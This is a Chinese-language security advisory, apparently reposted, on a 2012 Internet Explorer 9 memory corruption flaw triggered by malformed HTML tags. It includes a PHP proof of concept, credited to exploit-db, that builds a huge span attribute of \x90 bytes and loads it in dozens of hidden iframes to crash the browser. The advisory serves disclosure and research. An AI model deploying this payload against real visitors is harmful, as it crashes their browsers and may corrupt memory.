Microsoft IE 9畸形HTML标签处理内存破坏漏洞


发布日期:2012-11-01
更新日期:2012-11-08

受影响系统:
Microsoft Internet Explorer 9.x
描述:
--------------------------------------------------------------------------------
Microsoft Internet Explorer是微软公司推出的一款网页浏览器,使用相当广泛。
 
IE9在处理畸形HTML标签数据时存在安全漏洞,远程攻击者可能利用此漏洞导致内存破坏,应用崩溃。
 
<*来源:Jean Pascal Pereira
 
  链接:http://www.exploit-db.com/exploits/22401/
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
set_time_limit(0);

 ini_set('memory_limit', '300M');

 if(!file_exists("junk.htm"))
 {
  $string = "<span id='";
   
  for($i = 0; $i < 24117256; $i++)
  {
    $string .= "\x90";
  }
  $string .= "'></span>";
   
  file_put_contents("junk.htm", $string);
 }

 print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
 print "<iframe style='width: 800px; height: 500px;' src='junk.htm'>\n";

 for($i = 0; $i < 60; $i++)
 {
  print "<iframe style='display:none' src='junk.htm'>\n";
 }

 /* http://0xffe4.org */

 ?>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Microsoft
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.microsoft.com/windows/ie/default.asp

相关内容